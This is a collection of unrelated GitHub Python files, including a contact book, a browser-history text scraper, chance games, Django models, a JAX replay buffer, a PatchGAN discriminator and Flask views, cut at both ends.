c.last_name == last_name:\n return c\n elif first_name != \"\" and c.first_name == first_name:\n return c\n elif last_name != \"\" and c.last_name == last_name:\n return c\n\n def find_contact_by_phone(self, cell_phone):\n for c in self.__contacts:\n if cell_phone != \"\" and c.cell_phone == cell_phone:\n return c\n\n def __read_contacts_from_file(self, file_name):\n with open(file_name, \"r\", newline=\"\") as file:\n reader = csv.reader(file)\n\n i = 0\n\n next(reader)\n\n for row in reader:\n c = Contact()\n c.first_name = row[0]\n c.last_name = row[1]\n c.company_name = row[2]\n c.address = row[3]\n c.city = row[4]\n c.county = row[5]\n c.state = row[6]\n c.zip = row[7]\n c.cell_phone = row[8]\n c.home_phone = row[9]\n c.email = row[10]\n self.add_contact(c)\n\n i += 1\n\n def write_contacts_from_console(self, file_name):\n with open(file_name, \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writeheader()\n\n writer.writerows(self.__contacts)\n\n\n\n\ndef add_contact_from_console(number):\n for n in range(number):\n person = Contact()\n print(\"Contact # %d\" % + 1)\n\n person.first_name = input(\"First name - \")\n person.last_name = input(\"Second name - \")\n person.company_name = input(\"Company name - \")\n person.address = input(\"Address - \")\n person.city = input(\"City - \")\n person.county = input(\"County - \")\n person.state = input(\"State - \")\n person.zip = input(\"Zip - \")\n person.cell_phone = input(\"Cell phone - \")\n person.home_phone = input(\"Home phone - \")\n person.email = input(\"Email - \")\n\n\ncontactsBook = ContactsBook(\"contacts.csv\")\n#contactsBook.read_contacts_from_file(\"contacts.csv\")\n\nadd_contact_from_console(1)\ncontactsBook.show_contacts()\ncontactsBook.write_contacts_from_console(file_name=\"contacts.csv\")","repo_name":"DrowLegend/Tasks-from-course","sub_path":"PhoneBook.py","file_name":"PhoneBook.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20957565421","text":"import os\nimport re\nfrom datetime import datetime\nfrom typing import List, Union\nfrom urllib.parse import urlparse\n\nimport pandas as pd\nimport requests\nimport requests_cache\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom pandas import DataFrame\n\nfrom no_preference.lib.util import get_logger\n\n\nSUPPORTED_PROTOCOLS = r'^https?://'\nWEB_CONTENT_EXTENSIONS_PATTERN = r'(\\.(aspx?|x?html?|php(3|4)|jspx?))?'\nIRRELEVANT_URL_PATTERNS = [\n # Search engines homepages and queries\n r'^https?:\\/\\/(www\\.)?google\\.com\\/?\\??.*$',\n r'^https?:\\/\\/(www\\.)?google\\.com\\/search.*$',\n r'^https?:\\/\\/(www\\.)?bing\\.com\\/?\\??.*$',\n r'^https?:\\/\\/(www\\.)?bing\\.com\\/search.*$',\n # Supported social media (analysed separately)\n r'^https?:\\/\\/(www\\.)?twitter\\.com.*$',\n r'^https?:\\/\\/(www\\.)?facebook\\.com.*$',\n]\n\nLOGGER = get_logger(__name__)\n\nrequests_cache.install_cache()\n\n\ndef _get_url_extension(url: str) -> str:\n path = urlparse(url).path\n return os.path.splitext(path)[1]\n\n\ndef _is_relevant_url(url: str) -> bool:\n # Filter out non-http(s) URLs\n if not re.match(SUPPORTED_PROTOCOLS, url):\n return False\n\n for pattern in IRRELEVANT_URL_PATTERNS:\n if re.match(pattern, url):\n return False\n\n url_ext = _get_url_extension(url)\n return bool(re.match(WEB_CONTENT_EXTENSIONS_PATTERN, url_ext))\n\n\ndef _filter_urls(urls: List[str]) -> List[str]:\n \"\"\"\n Removes duplicate entries, irrelevant URLs (like search engine queries), ...\n :param urls:\n :return:\n \"\"\"\n # Remove duplicates\n urls = set(urls)\n\n # Filter irrelevant URLs\n return list(filter(_is_relevant_url, urls))\n\n\ndef _get_url_text(url: str) -> Union[str, None]:\n # Read URL and create DOM object\n try:\n response = requests.get(url)\n except requests.exceptions.ConnectionError:\n LOGGER.warning(f'Could not load URL \"{url}\".')\n return\n html = response.text\n dom = BeautifulSoup(html, 'html.parser')\n\n # Remove all code tags\n for code in dom(['script', 'style']):\n code.extract()\n\n text: str = dom.get_text(separator=' ')\n\n # Remove empty line, trim each line and reassemble the string\n filtered_text = '\\n'.join(\n map(lambda line: line.strip(),\n filter(lambda line: not re.match(r'^\\s*$', line), text.splitlines())))\n\n return filtered_text\n\n\ndef _load_history_text(urls: List[str]) -> List[str]:\n relevant_urls = _filter_urls(urls)\n relevant_urls_len = len(relevant_urls)\n LOGGER.info('Loading {} relevant URLs out of {} history entries.'.format(relevant_urls_len, len(urls)))\n history_text = []\n for i, url in enumerate(relevant_urls):\n LOGGER.info(f'{i + 1}/{relevant_urls_len}: Loading \"{url}\".')\n url_text = _get_url_text(url)\n if url_text:\n history_text.append(url_text)\n return history_text\n\n\ndef load_history(history: DataFrame, from_time: datetime = None, to_time: datetime = None) -> DataFrame:\n # Filter by visit time\n if from_time or to_time:\n history['date'] = pd.to_datetime(history['date'], format='%Y-%m-%d %H:%M:%S')\n\n if not from_time:\n from_time = datetime.fromtimestamp(0)\n if not to_time:\n to_time = datetime.now()\n\n history = history[(from_time <= history['date']) & (history['date'] <= to_time)]\n\n return DataFrame(zip(history['date'], _load_history_text(history['url'])),\n columns=['date', 'content'])\n\n\nif __name__ == '__main__':\n csv = pd.read_csv('../../datasets/chrome_history_nathan.csv', parse_dates=['last_visit_time'], date_parser=parse)\n results = load_history(csv, from_time=datetime(2019, 10, 23), to_time=datetime(2019, 10, 23, 23, 59, 59))\n print(results)\n","repo_name":"nathanlepori/sit-no-preference","sub_path":"no_preference/processing/browser_history.py","file_name":"browser_history.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13236789287","text":"import random\n\nmoney = 100\n\n#Write your game of chance functions here\ndef coin():\n coin = random.randint(1,2)\n if coin == 1:\n return \"Heads\"\n else:\n return \"Tails\"\n\ndef coin_flips(guess,bet):\n toss = coin()\n if guess != \"Heads\" and \"Tails\" :\n print(\"Your input is wrong\")\n else :\n print(toss)\n if toss == guess :\n return + bet \n else :\n return - bet\n \n\n#print(coin_flips(Heads,10)\n\n\n\ndef guess_cho_han():\n dice_one = random.randint(1,6)\n dice_two = random.randint(1,6)\n result_dice = dice_one + dice_two\n if result_dice%2 == 0:\n return \"even\"\n else:\n return \"odd\"\n\ndef cho_han(guess,bet):\n result = guess_cho_han() \n if guess != \"odd\" and \"even\":\n print(\"Your input is wrong\")\n else :\n print(result)\n if result == guess :\n return + bet\n else :\n return - bet \n\n#print(cho_han(\"odd\",50))\n\n\ndef card():\n player1 = random.randint(1,10)\n player2 = random.randint(1,10)\n if player1 > player2:\n return \"player1\"\n elif player2 > player1:\n return \"player2\"\n else :\n return (\"player1\",\"player2\")\n\ndef player_wins(guess,bet):\n pick_player = card()\n if guess != \"player1\" and \"player2\":\n print(\"Your input is wrong\")\n else :\n print(pick_player)\n if pick_player == guess:\n return + bet\n elif pick_player != guess:\n return - bet \n elif pick_player == \"player1\" and \"player2\":\n return money \n \n \n\n#Call your game of chance functions here\nmoney += coin_flips(\"Heads\", 60)\nmoney += cho_han(\"odd\", 70)\nmoney += player_wins(\"player1\",80)\nif money < 0 :\n print(\"You have 0 balance now!\")\nelse : \n print(\"You have \"+ str(money) +\" balance now!\")\n\n\n\n\n\n","repo_name":"adityaks-lts/my_python_scripts","sub_path":"chance_game/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39590450201","text":"#!-*-coding:utf-8-*-\nimport sys\n\n# import PyQt5 QtCore and QtGui modules\nfrom PyQt5 import QtWidgets\nfrom main_window import Ui_Form # импорт нашего сгенерированного файла\n\n\nclass MyWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MyWindow, self).__init__()\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n\napp = QtWidgets.QApplication([])\napplication = MyWindow()\napplication.show()\n\nsys.exit(app.exec())\n","repo_name":"AstralMortem/get_random_photo_prnt.sc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8022369369","text":"list_name = ['a', 'b', 'c']\n\nprint(list_name)\n\nnum = 5\nif num < 10:\n print(\"Your number is small!\")\ntrolls = [\"Michael\", 'trolls', 'Matt']\n\nfor troll in trolls:\n print(troll)\n\nif num < 10:\n print('small num')\nelif num == 100:\n print('100')\n\nnums = [1, 2, 3, 4, 5]\ndouble_nums = []\nfor num in nums:\n double_nums.append(2 * num)\n\nprint(\"DONE\", double_nums)\n\n# list comprehension examples\n# can be used to replaced map, filter, reduce\nnames = ['Steve', 'Matt', 'Kristen', 'Zack', 'Jason', 'Mary']\nshouts = [name.upper() for name in names]\n\nprint('upper', shouts)\n\ns = \"here is a string take a look at this!\"\nfreq_count = {char: s.count(char) for char in s}\n\nnums = [1, 2, 3, 4, 12, 18, 100, 5]\nsmall_nums = [10 + num for num in nums if num < 10]\ndouble_nums = [2 * num for num in nums]\nprint(double_nums, small_nums)\n\n# writing functions\n\n\ndef add(x, y):\n return x + y\n\n\nprint(add(1, 2))\n","repo_name":"stevehcao/Rithm_Practice","sub_path":"python-is-great/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70315682726","text":"from typing import List\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n res = []\n if root:\n from collections import deque\n que = deque([root])\n while que:\n node = que[-1] # 每次都取最后一个就行\n res.append(node.val)\n\n # 获取下一层所有的节点\n for i in range(len(que)):\n node = que.popleft()\n if node.left:\n que.append(node.left)\n if node.right:\n que.append(node.right)\n return res","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/二叉树/二叉树遍历/层序遍历/199_rightSideView.py","file_name":"199_rightSideView.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14402804664","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n is_student = models.BooleanField(default=True)\n is_teacher = models.BooleanField(default=False)\n\nclass Students(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n student_id = models.IntegerField(null=True)\n gpa = models.DecimalField(decimal_places=2, max_digits=3, null=True)\n\n #def __str__(self):\n # return \"%s %s\" % (self.firstName, self.lastName)\n\n class Meta:\n verbose_name_plural = \"Students\"\n\nclass Faculty(models.Model):\n faculty_id = models.IntegerField(primary_key = True)\n firstName = models.CharField(max_length=40)\n lastName = models.CharField(max_length=40)\n email = models.EmailField()\n password = models.CharField(max_length=64)\n jobTitle = models.CharField(max_length=40)\n\n class Meta:\n verbose_name_plural = \"Faculty\"\n\n def __str__(self):\n return \"%s %s\" % (self.firstName,self.lastName)\n\nclass Courses(models.Model):\n course_id = models.IntegerField(primary_key = True)\n courseName = models.CharField(max_length=40)\n faculty = models.ForeignKey(Faculty, on_delete=models.CASCADE,)\n\n class Meta:\n verbose_name_plural = \"Courses\"\n\n def __str__(self):\n return self.courseName\n\nclass Grades(models.Model):\n grade_id = models.IntegerField(primary_key = True)\n student = models.ForeignKey(Students,on_delete=models.CASCADE)\n course = models.ForeignKey(Courses,on_delete=models.CASCADE)\n courseGrade = models.IntegerField()\n\n class Meta:\n verbose_name_plural = \"Grades\"\n","repo_name":"Rockcoldice/CS3321_LMS_Project","sub_path":"myLMS_website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9592487578","text":"from Event.trade_event import TradeEvent\n\nfrom Exchange.exchange_db_query import ExchangeDbQuery\n\nclass MatchingEngine:\n\tdef __init__(self, conn):\n\t\tself._conn = conn\n\t\tself._engine_id = 3000\n\n\tdef check_order_book(self, symbol, book_ext):\n\t\tbook_name = '_'.join((book_ext, str(symbol)))\n\t\tquery = ExchangeDbQuery.get_top_level_order_book_data_query().format(book_name)\n\t\trows, cols = self._conn.select(query)\n\t\tprint(query)\n\t\tif not cols:\n\t\t\traise Exception(\"DbError\")\n\t\tif not rows: \n\t\t\treturn None\n\n\t\tprice = rows[0][cols.index('price')]\n\n\t\tquery = ExchangeDbQuery.get_earliest_buy_order_at_price_query().format(price, symbol)\n\t\trows, cols = self._conn.select(query)\n \n\t\tbuy_order_id = rows[0][cols.index('order_id')]\n\t\tbuy_player_id = rows[0][cols.index('player_id')]\n\t\tbuy_quantity = rows[0][cols.index('quantity')]\n\t\tbuy_lut = rows[0][cols.index('last_updated_time')]\n\n\t\tquery = ExchangeDbQuery.get_earliest_sell_order_at_price_query().format(price, symbol)\n\t\trows, cols = self._conn.select(query)\n\n\t\tsell_order_id = rows[0][cols.index('order_id')]\n\t\tsell_player_id = rows[0][cols.index('player_id')]\n\t\tsell_quantity = rows[0][cols.index('quantity')]\n\t\tsell_lut = rows[0][cols.index('last_updated_time')]\n\t\t\n\t\tte = TradeEvent(symbol, self._engine_id, buy_order_id, sell_player_id, buy_quantity, sell_quantity, buy_player_id, sell_player_id, buy_lut, sell_lut, price)\n\t\treturn te","repo_name":"imnotaqtpie/National-Simulated-Exchange","sub_path":"Exchange/matching_engine.py","file_name":"matching_engine.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9612022269","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nans=chk=0\nd=[]\nfor i in range(5):\n x=int(input())\n if x%10:\n d.append((x%10,x))\n else:\n ans+=x\nd.sort(reverse=True)\nfor i in d:\n ans+=((i[1]+10)//10)*10\nif len(d): ans-=10-d[-1][1]%10\n\nprint(ans)\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b101_125/b123/b1.py","file_name":"b1.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75326360164","text":"from typing import Dict, Iterable, Optional, Tuple, Union\nimport collections\nimport jax\nimport numpy as np\nfrom gym.utils import seeding\n\nfrom jaxrl2.types import DataType\n\nDatasetDict = Dict[str, DataType]\nfrom flax.core import frozen_dict\n\ndef concat_recursive(batches):\n new_batch = {}\n for k, v in batches[0].items():\n if isinstance(v, frozen_dict.FrozenDict):\n new_batch[k] = concat_recursive([batches[0][k], batches[1][k]])\n else:\n new_batch[k] = np.concatenate([b[k] for b in batches], 0)\n return new_batch\n\ndef _check_lengths(dataset_dict: DatasetDict,\n dataset_len: Optional[int] = None) -> int:\n for v in dataset_dict.values():\n if isinstance(v, dict):\n dataset_len = dataset_len or _check_lengths(v, dataset_len)\n elif isinstance(v, np.ndarray):\n item_len = len(v)\n dataset_len = dataset_len or item_len\n assert dataset_len == item_len, 'Inconsistent item lengths in the dataset.'\n else:\n raise TypeError('Unsupported type.')\n return dataset_len\n\n\ndef _split(dataset_dict: DatasetDict,\n index: int) -> Tuple[DatasetDict, DatasetDict]:\n train_dataset_dict, test_dataset_dict = {}, {}\n for k, v in dataset_dict.items():\n if isinstance(v, dict):\n train_v, test_v = _split(v, index)\n elif isinstance(v, np.ndarray):\n train_v, test_v = v[:index], v[index:]\n else:\n raise TypeError('Unsupported type.')\n train_dataset_dict[k] = train_v\n test_dataset_dict[k] = test_v\n return train_dataset_dict, test_dataset_dict\n\n\ndef _sample(dataset_dict: Union[np.ndarray, DatasetDict],\n indx: np.ndarray) -> DatasetDict:\n if isinstance(dataset_dict, np.ndarray):\n return dataset_dict[indx]\n elif isinstance(dataset_dict, dict):\n batch = {}\n for k, v in dataset_dict.items():\n batch[k] = _sample(v, indx)\n else:\n raise TypeError(\"Unsupported type.\")\n return batch\n\n\nclass Dataset(object):\n\n def __init__(self, dataset_dict: DatasetDict, seed: Optional[int] = None):\n self.dataset_dict = dataset_dict\n self.dataset_len = _check_lengths(dataset_dict)\n\n # Seeding similar to OpenAI Gym:\n # https://github.com/openai/gym/blob/master/gym/spaces/space.py#L46\n self._np_random = None\n if seed is not None:\n self.seed(seed)\n\n @property\n def np_random(self) -> np.random.RandomState:\n if self._np_random is None:\n self.seed()\n return self._np_random\n\n def seed(self, seed: Optional[int] = None) -> list:\n self._np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def __len__(self) -> int:\n return self.dataset_len\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n if indx is None:\n if hasattr(self.np_random, 'integers'):\n indx = self.np_random.integers(len(self), size=batch_size)\n else:\n indx = self.np_random.randint(len(self), size=batch_size)\n\n batch = dict()\n\n if keys is None:\n keys = self.dataset_dict.keys()\n\n for k in keys:\n if isinstance(self.dataset_dict[k], dict):\n batch[k] = _sample(self.dataset_dict[k], indx)\n else:\n batch[k] = self.dataset_dict[k][indx]\n\n return frozen_dict.freeze(batch)\n\n def split(self, ratio: float) -> Tuple['Dataset', 'Dataset']:\n assert 0 < ratio and ratio < 1\n index = int(self.dataset_len * ratio)\n train_dataset_dict, test_dataset_dict = _split(self.dataset_dict,\n index)\n return Dataset(train_dataset_dict), Dataset(test_dataset_dict)\n\n\nclass MixingReplayBuffer():\n\n def __init__(\n self,\n replay_buffers,\n mixing_ratio\n ):\n\n \"\"\"\n :param replay_buffers: sample from given replay buffer with specified probability\n \"\"\"\n\n self.replay_buffers = replay_buffers\n self.mixing_ratio = mixing_ratio\n assert len(replay_buffers) == 2\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n\n batches = []\n size_first = int(np.floor(batch_size*self.mixing_ratio))\n sub_batch_sizes = [size_first, batch_size - size_first]\n for buf, sb in zip(self.replay_buffers, sub_batch_sizes):\n batches.append(buf.sample(sb))\n\n\n return frozen_dict.freeze(concat_recursive(batches))\n\n def set_mixing_ratio(self, mixing_ratio):\n self.mixing_ratio = mixing_ratio\n\n def seed(self, seed):\n [b.seed(seed) for b in self.replay_buffers]\n\n def length(self):\n return [b.length() for b in self.replay_buffers]\n\n def get_random_trajs(self, batch_size):\n return [b.get_random_trajs(batch_size) for b in self.replay_buffers]\n\n\n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n for _ in range(n):\n data = self.sample(batch_size, keys, indx)\n queue.append(jax.device_put(data))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n \n def increment_traj_counter(self):\n [b.increment_traj_counter() for b in self.replay_buffers]\n\n def compute_action_stats(self):\n\n action_stats_0 = self.replay_buffers[0].compute_action_stats()\n action_stats_1 = self.replay_buffers[1].compute_action_stats()\n\n ratio = self.mixing_ratio\n actions_mean = ratio * action_stats_0['mean'] + (1 - ratio) * action_stats_1['mean']\n actions_std = np.sqrt(ratio * action_stats_0['std'] ** 2 + (1 - ratio) * action_stats_1['std']** 2 + ratio * (1 - ratio) * (action_stats_0['mean'] - action_stats_1['mean']) ** 2)\n\n return {'mean': actions_mean, 'std': actions_std}\n\n def normalize_actions(self, action_stats):\n # do not normalize gripper dimension (last dimension)\n [b.normalize_actions(action_stats) for b in self.replay_buffers]\n \nclass MixingReplayBufferParallel():\n \n def __init__(\n self,\n replay_buffers,\n mixing_ratio,\n num_devices=len(jax.devices())\n ):\n\n \"\"\"\n :param replay_buffers: sample from given replay buffer with specified probability\n \"\"\"\n\n self.replay_buffers = replay_buffers\n self.mixing_ratio = mixing_ratio\n assert len(replay_buffers) == 2\n self.num_devices=num_devices\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n\n batches = []\n size_first = int(np.floor(batch_size*self.mixing_ratio))\n sub_batch_sizes = [size_first, batch_size - size_first]\n for buf, sb in zip(self.replay_buffers, sub_batch_sizes):\n batches.append(buf.sample(sb))\n\n\n return frozen_dict.freeze(concat_recursive(batches))\n\n def set_mixing_ratio(self, mixing_ratio):\n self.mixing_ratio = mixing_ratio\n\n def seed(self, seed):\n [b.seed(seed) for b in self.replay_buffers]\n\n def length(self):\n return [b.length() for b in self.replay_buffers]\n\n def get_random_trajs(self, batch_size):\n return [b.get_random_trajs(batch_size) for b in self.replay_buffers]\n\n\n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n assert batch_size % self.num_devices == 0\n effective_batch_size = batch_size // self.num_devices\n for _ in range(n):\n data = [self.sample(effective_batch_size, keys, indx) for _ in range(self.num_devices)] \n queue.append(jax.device_put_sharded(data, jax.devices()))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n \n def increment_traj_counter(self):\n [b.increment_traj_counter() for b in self.replay_buffers]\n\n def compute_action_stats(self):\n\n action_stats_0 = self.replay_buffers[0].compute_action_stats()\n action_stats_1 = self.replay_buffers[1].compute_action_stats()\n\n ratio = self.mixing_ratio\n actions_mean = ratio * action_stats_0['mean'] + (1 - ratio) * action_stats_1['mean']\n actions_std = np.sqrt(ratio * action_stats_0['std'] ** 2 + (1 - ratio) * action_stats_1['std']** 2 + ratio * (1 - ratio) * (action_stats_0['mean'] - action_stats_1['mean']) ** 2)\n\n return {'mean': actions_mean, 'std': actions_std}\n\n def normalize_actions(self, action_stats):\n # do not normalize gripper dimension (last dimension)\n [b.normalize_actions(action_stats) for b in self.replay_buffers]\n","repo_name":"Asap7772/PTR","sub_path":"jaxrl2/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"20021988799","text":"import random\r\n\r\n\r\nwith open('data//buy_data.txt', 'w') as f: #生成购买数据\r\n for i in range(1000): #假设有1000个人\r\n for x in range(random.randint(0,30)): #假设一人购买0~30件商品\r\n f.write(str(i) + '\\t' +'item'+str(random.randint(0,99)) + '\\t' + 'buy' + '\\n') #生成购买数据(假设有100件商品)\r\n\r\n\r\nwith open('data//entities.txt', 'w') as f: #生成实体索引\r\n for i in range(1000): #1000个人和100件物品\r\n f.write(str(i) + '\\t' +str(i) +'\\n') #生成people索引\r\n for i in range(100):\r\n f.write('item'+str(i)+'\\t'+str(1000+i)+'\\n') #生成物品索引\r\n\r\nwith open('data//relations.txt', 'w') as f: #生成关联索引\r\n f.write('buy' + '\\t' +str(0) +'\\n') #还可扩展成加入购物车、购买、勾选喜爱类似的关系\r\n","repo_name":"Zhankun-Xiong/Recommendation-system-based-on-knowledge-graph-embedding","sub_path":"knowledge graph embedding的商品推荐系统/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"zh","doc_type":"code","stars":141,"dataset":"github-code","pt":"52"} +{"seq_id":"33455550028","text":"class Solution:\r\n def twoSum(self, nums: List[int], target: int) -> List[int]:\r\n #List is not defined as the test cases are provided by LeetCode\r\n #1 loop through the list\r\n \r\n for i in range(len(nums)):\r\n \r\n #2 add the second int to the first\r\n for j in range(i+1, len(nums)):\r\n sum = nums[i] + nums[j]\r\n #3 check the sum against the target \r\n #3.1 if yes then return as output\r\n if sum == target:\r\n return(i, j)\r\n #3.2 if no then repeat with next int against the first \r\n #if end of list is reached return \"no sum found\"\r\n else:\r\n print(\"No Sum Found\")\r\n\r\n","repo_name":"JosephBanks1/leetcode-practice","sub_path":"Two Sum.py","file_name":"Two Sum.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72775130724","text":"from yuuhpizzakebab import app, admin_required, login_required\nfrom .models import Drink\nfrom flask import render_template, session, redirect, url_for, request, flash\n\n\n@app.route('/drinks', methods=['GET'])\ndef list_drinks():\n \"\"\"Shows a list of drinks.\"\"\"\n return render_template('drink/drinks.html',\n drinks=Drink.get_all(),\n selecting=request.args.get('selecting'))\n\n\n@app.route('/drink/create', methods=['GET', 'POST'])\n@admin_required\ndef create_drink():\n \"\"\"Creates a new drink.\n\n Creates a new drink with POST.\n Shows a form to fill with GET.\n \"\"\"\n if request.method == 'POST':\n name = request.form['drink_name']\n price = request.form['drink_price']\n image_url = request.form['drink_image_url']\n\n d = Drink(None, name, price, image_url)\n success = d.save()\n\n if not success:\n flash('Some fields need to be filled', 'alert-danger')\n return render_template('drink/edit_drink.html', drink=d)\n\n flash('Created drink', 'alert-success')\n return redirect(url_for('list_drinks'))\n\n return render_template('drink/edit_drink.html')\n\n\n@app.route('/drink/edit/', methods=['GET', 'POST'])\n@admin_required\ndef edit_drink(drink_id):\n \"\"\"Edits a drink.\n\n arguments:\n drink_id -- id of the drink\n\n Saves the information with POST.\n Shows a form to edit the contents with GET.\n \"\"\"\n if request.method == 'POST':\n name = request.form['drink_name']\n price = request.form['drink_price']\n image_url = request.form['drink_image_url']\n\n k = Drink(drink_id, name, price, image_url)\n k.save()\n\n return redirect(url_for('list_drinks'))\n\n drink = Drink.get_by_id(drink_id)\n\n if not drink:\n return redirect(url_for('list_drinks'))\n\n return render_template('drink/edit_drink.html', drink=drink)\n\n\n@app.route('/drink/delete/', methods=['GET'])\n@admin_required\ndef delete_drink(drink_id):\n \"\"\"Deletes a drink.\n\n arguments:\n drink_id -- id of the drink\n \"\"\"\n Drink.delete_by_id(drink_id)\n flash('Removed drink', 'alert-success')\n\n return redirect(url_for('list_drinks'))\n","repo_name":"lex/yuuh-pizza-kebab","sub_path":"yuuhpizzakebab/drink/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2398219770","text":"\"\"\"\nPatchGAN Discriminator (https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/models/networks.py#L538)\n\"\"\"\nimport argparse\nimport torch\nimport torch.nn as nn\n\nclass Discriminator(nn.Module):\n def __init__(self, args, num_filters_last=64, n_layers=3) -> None:\n super().__init__()\n \n layers = [nn.Conv2d(args.image_channels, num_filters_last, 4, 2, 1), nn.LeakyReLU(0.2)]\n num_filters_mult = 1\n\n for i in range(1, n_layers + 1):\n num_filters_mult_last = num_filters_mult\n num_filters_mult = min(2 ** i, 8)\n layers += [\n nn.Conv2d(num_filters_last * num_filters_mult_last, num_filters_last * num_filters_mult, 4,\n 2 if i < n_layers else 1, 1, bias=False),\n nn.BatchNorm2d(num_filters_last * num_filters_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n layers.append(nn.Conv2d(num_filters_last * num_filters_mult, 1, 4, 1, 1))\n self.model = nn.Sequential(*layers)\n \n\n def forward(self, x):\n return self.model(x)\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"discriminator\")\n parser.add_argument('--image_channels', type=int, default=3, help='')\n\n args = parser.parse_args()\n \n d = Discriminator(args)\n \n x = torch.randn(1, 3, 256, 256)\n print(d(x).shape)\n import pdb;pdb.set_trace()\n print()","repo_name":"Lionelding/VQGAN_Pytorch_Practise","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37807722552","text":"'''\nGISSATALET.PY: A number guessing game\n\n__author__ = \"Johan Wrangö\"\n__credits__ = [\"Anne Onym\", \"Pseudo Nyman\", \"John Noname\"]\n__version__ = \"1.0.5\"\n__email__ = \"johan.wrango@ga.ntig.se\"\n'''\n\nimport random \nimport os #för os.system() så jag kan sudda skärmen\nfrom colors import bcolors #hämta färgkoder från modul \"colors\"\n\n\nwhile True: #Huvudloop så man kan köra flera spelomgångar. Om denna slutas avslutas spelet.\n os.system('cls') \n\n print(bcolors.YELLOW + \"\"\"\n ==============================\n G I S S A T A L E T 1 - 100 \n ====== Du har 7 försök! ======\\n\\n\"\"\")\n\n secret_number = random.randint(1, 100) \n total_guesses = 0\n\n while total_guesses <= 7: #Spelloop: Aktuellt spel\n try:\n guess = int(input(bcolors.DEFAULT + \"Gissa mitt hemliga tal: \"))\n except ValueError:\n print(bcolors.RED + \"Du måste skriva ett heltal - pröva igen\\n\")\n continue\n \n total_guesses += 1\n \n if guess > secret_number:\n print(bcolors.RED + \"För HÖGT\")\n elif guess < secret_number:\n print(bcolors.PURPLE + \"För LÅGT\")\n elif guess == secret_number:\n print(bcolors.GREEN + f'\\nGrattis! Du hittade hemliga talet {secret_number} på ' +\n str(total_guesses)+' försök!\\n\\n')\n break\n \n if total_guesses == 7: \n print(bcolors.YELLOW + f'\\nTyvärr, du hittade inte mitt hemliga tal: {secret_number}.')\n break\n \n #Spelet frågar alltid om man vill 